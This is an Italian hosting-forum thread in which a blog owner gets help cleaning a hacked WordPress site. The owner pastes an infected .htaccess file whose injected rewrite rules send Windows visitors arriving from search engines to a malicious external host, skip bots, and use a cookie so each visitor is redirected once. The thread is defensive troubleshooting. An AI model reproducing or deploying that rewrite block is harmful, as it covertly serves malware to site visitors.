Blog infetto?

[bookandnegative]

Salve ieri il nostro blog risultava compromesso, in pratica non si riuscivano ad aprire pagine oltre alla homepage, se si cliccava su altri link il browser indicava mancante o il file index.php o index.html.
Comunque per ovviare al problema ho reinstallato wordpress da pannello di controllo e tutto è tornato ok e funzionante, alcuni utenti mi segnalano che è presente un virus nell'host, io non so onestamente che fare e chiedo informazioni a riguardo o indirizzi per contattare il supporto tecnico adeguato al caso.
Nel caso se fosse possibile fare una verifica.
Edit:
Scansionato mio pc con hitman pro 3.6, avira antivir, mbam tutti aggiornati all'ultima versione, come il pc dell'altro amministratore, tutto risulta pulito.
Ho cambiato password di accesso a wordpress e a pannello di controllo, avendo letto altre discussioni che ne parlavano a riguardo.

Ecco uno screenshot:



Uploaded with ImageShack.us

Grazie per l'attenzione

[dapeco]

c'è parecchia spazzatura nel tuo .htaccess

dovresti ripulirlo (togliendo quello che c'è dopo

Codice:

# av:PHP-upload
php_value memory_limit 128M
php_value upload_max_filesize 10M
php_value post_max_size 10M
php_value max_input_time 300
# PHP-upload

Inoltre dovresti eseguire una scansione del tuo pc e modificare la password di accesso all'account AlterVista.

Io non so risponderti però ti devo avvisare che aprendo la tua pagina home da google anzichè aprire il sito mi scarica un file... Ora sei libero di fare ciò che vuoi ma dubito che sia voluta questa cosa... Comunque ho visto il sito aprendo un altra pagina... Bello, Bravo..

[bookandnegative]

Cambiato password accesso pannello di controllo ad altervista, al blog wordpress e scansionati tutti i pc.
L'indirizzo del blog è http://bookandnegative.altervista.org/blog/

Grazie per la segnalazione everyhere (e grazie per i complimenti ;)), con mozilla fa scaricare quel file che è mostrato nell'immagine e che ci era stato gia segnalato ma non apre il blog, con chrome no, il sito parte e va.


@Sembrava che avessi cancellato ma il testo rimane sempre li, anche se faccio salva non salva nulla e rimane tutto come prima

Grazie

di niente... il lavoro fatto da te è fatto per ospitare gli utenti del web e soddisfarli e non a scopo di di guadagno... certo se poi arriva anche quello... MEGLIO COSI'

[bookandnegative]

1)Pare che il file venga scaricato tutt'ora.

2)Ora pero se cerco book and negative su google e clicco sul primo link, mi ritorna in homepage di google, se rieseguo la ricerca con la query book and negative e clicco di nuovo sul primo link quello della homepage, va tutto a buon fine.
Presumo il difetto deriva dal fatto che il link indicato è:
bookandnegative.altervista.org e non va il redirect verso bookandnegative.altervista.org/blog

3)Non è possibile modificare il file .htaccess come gia detto prima, se faccio salva non effettua modifiche.

Che cosa devo fare? per i due problemi sopraelencati.

Resto in attesa saluti e grazie

[andreafallico]

Posta il contenuto del file .htaccess

[bookandnegative]

Ecco il file htaccess, ma non riesco a modificarlo, non salva le modifiche.

Codice:

# # av:Toolbar
SetEnv AV_TOOLBAR 0

# # av:php5-engine
AddHandler av-php5 .php


# av:AntiHotlink
RewriteEngine on
RewriteBase /
RewriteCond %{REQUEST_URI} \.(gif|jpe?g|png)$ [NC]
RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !^http://([a-z0-9\-\.]*)bookandnegative\.altervista\.org
RewriteCond %{REQUEST_URI} !^\/_altervista_ht\/
RewriteCond %{HTTP_REFERER} !^http://([a-z0-9\-\.]+)XXXXXXXXXXXXXXXX\.
RewriteRule .*$ http://hl.altervista.org/split.php?http://%{HTTP_HOST}%{REQUEST_URI} [R,L]
# AntiHotlink

# av:PHP-upload
php_value memory_limit 128M
php_value upload_max_filesize 10M
php_value post_max_size 10M
php_value max_input_time 300
# PHP-upload


<IfModule prefork.c>
RewriteEngine On
RewriteCond %{REQUEST_METHOD}   ^GET$
RewriteCond %{HTTP_REFERER}     ^(http\:\/\/)?([^\/\?]*\.)?(wordpress|twit|tweet|flickr\.|linkedin|google\.|yahoo\.|bing\.|msn\.|ask\.|excite\.|altavista\.|netscape\.|aol\.|hotbot\.|goto\.|infoseek\.|mamma\.|alltheweb\.|lycos\.|metacrawler\.|mail\.|dogpile\?).*$   [NC]
RewriteCond %{HTTP_REFERER}     !^.*(imgres\?q).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(bing|Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndication).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sNews|BeOS|BigBlogZoo).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatcher).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Bookmark|bot|CE\-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\shiptop).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Diagnostics|DTAAgent|EmeraldShield|endo|Evaal|Everest\-Vulcan).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|Fuck\sYou|Google).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda\-Search|HP\-UX).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|iPhone|IRIX|Jakarta|JetBrains).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(LinknSurf|Linux|LiveJournal|Lonopono|Lotus\-Notes|Lycos|Lynx|Mac\_PowerPC).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Mac\_PPC|Mac\s10|Mac\sOS|macDN|Macintosh|Mediapartners|Megite|MetaProducts).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Miva|Mobile|NetBSD|NetNewsWire|NetResearchServer|NewsAlloy|NewsFire).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nutch|ObjectSearch|Octora).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenIntelligenceData|oreilly).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(os\=Mac|P900i|panscient|perl|PlayStation|POE\-Component|PrivacyFinder).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(psycheclone|Python|retriever|Rojo|RSS|SBIder|Scooter|Seeker|Series\s60).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(SharpReader|SiteBar|Slurp|Snoopy|Soap\sClient|Socialmarks|Sphere\sScout).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(spider|sproose|Rambler|Straw|subscriber|SunOS|Surfer|Syndic8).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Syntryx|TargetYourNews|Technorati|Thunderbird|Twiceler|urllib|Validator).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Vienna|voyager|W3C|Wavefire|webcollage|Webmaster|WebPatrol|wget|Win\s9x).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Win16|Win95|Win98|Windows\s95|Windows\s98|Windows\sCE|Windows\sNT\s4).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(WinHTTP|WinNT4|WordPress|WWWeasel|wwwster|yacy|Yahoo).*$   [NC]
RewriteCond %{HTTP_USER_AGENT}  !^.*(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg).*$   [NC]
RewriteCond %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png|.*jpeg|.*mpg|.*avi|.*zip|.*gz|.*tar|.*ico$ [NC]
RewriteCond %{HTTP_COOKIE}      !^.*vhw.*$ [NC]
RewriteCond %{HTTP_USER_AGENT}  .*Windows.* [NC]
RewriteCond %{HTTPS}            ^off$
RewriteRule ^(.*)$              http://%{REMOTE_PORT}.p-balls.com/url?sa=N&source=web&cd=36&ved=0gXe31J7v&url=http://%{HTTP_HOST}%{REQUEST_URI}&ei=2pgge6jG5auxqo2OzlU09Ja1oQ==&usg=DbQ3C4Jx8yAoSHqtDQrQDT&sig2=UmMLzvFz32wvBsu8djR-RS  [R=302,L,CO=vhw:81:%{HTTP_HOST}:11112:/:0:HttpOnly]
</IfModule>
#045cd783078bca047a77113598bc3a6ae7e0e54659f3a6c46f65d30b

------------------------

Sono riuscito a cancellare il codice sotto le regole del php, ma rimangono i problemi
del punto 1 e 2 ovvero :

1)Pare che il file venga scaricato tutt'ora.

2)Ora pero se cerco book and negative su google e clicco sul primo link, mi ritorna in homepage di google, se rieseguo la ricerca con la query book and negative e clicco di nuovo sul primo link quello della homepage, va tutto a buon fine.
Presumo il difetto deriva dal fatto che il link indicato è:
bookandnegative.altervista.org e non va il redirect verso bookandnegative.altervista.org/blog

Ho notato se puo essere d'aiuto che il file virus viene scaricato in automatico cercando e cliccando sull'indirizzo gia precedentemente indicato, quando vi è un nuovo ip, nel senso che anche se cancello tutto con ccleaner e provo con n browser il virus verra scaricato solo una volta in quanto "forse" c'è un controllo sull'ip.

-----------------------

Restoin attesa di risposte non ho nessuna intenzione di fare da ricettacolo per virus.

[dapeco]

* Hai eseguito una scansione approfondita del tuo PC con un buon antivirus?
* Hai modificato la password di accesso all'account AlterVista?
* Wordpress è aggiornato all'ultima versione disponibile? Lo sono anche i plugin?

[bookandnegative]

Cambiato password accesso pannello di controllo ad altervista, al blog wordpress e scansionati tutti i pc.

Questo accadeva il giorno 3.

Le scansioni sono state effettuate con due antivirus differenti e con altrettanti programmi di rimozione malware, hanno dato esito negativo.

La versione di Wordpress è la più recente. Ora provo ad aggiornare i plugin, anche se dubito cambi qualcosa.
Grazie.

---------------------

Ccome gia scritto fatto tutto e aggiornato tutto

[dapeco]

Hai aggiornato anche eventuali altri applicativi sull'account? Per ora l'.htaccess mi sembra pulito.

[bookandnegative]

Ho aggiornato il forum phpbb e poi mi è venuto un dubbio che alla fine "forse" si è rivelato la soluzione...
In ogni cartella del sito web, non necessariamente cartella root \ blog e forum, ma anche in cartelle create da me come immagini e audio, vi era posto un file htaccess con tutto quel codice quotato precedentemente.

Sembra essersi risolto il tutto, se possibilmente si può fare una verifica.

Saluti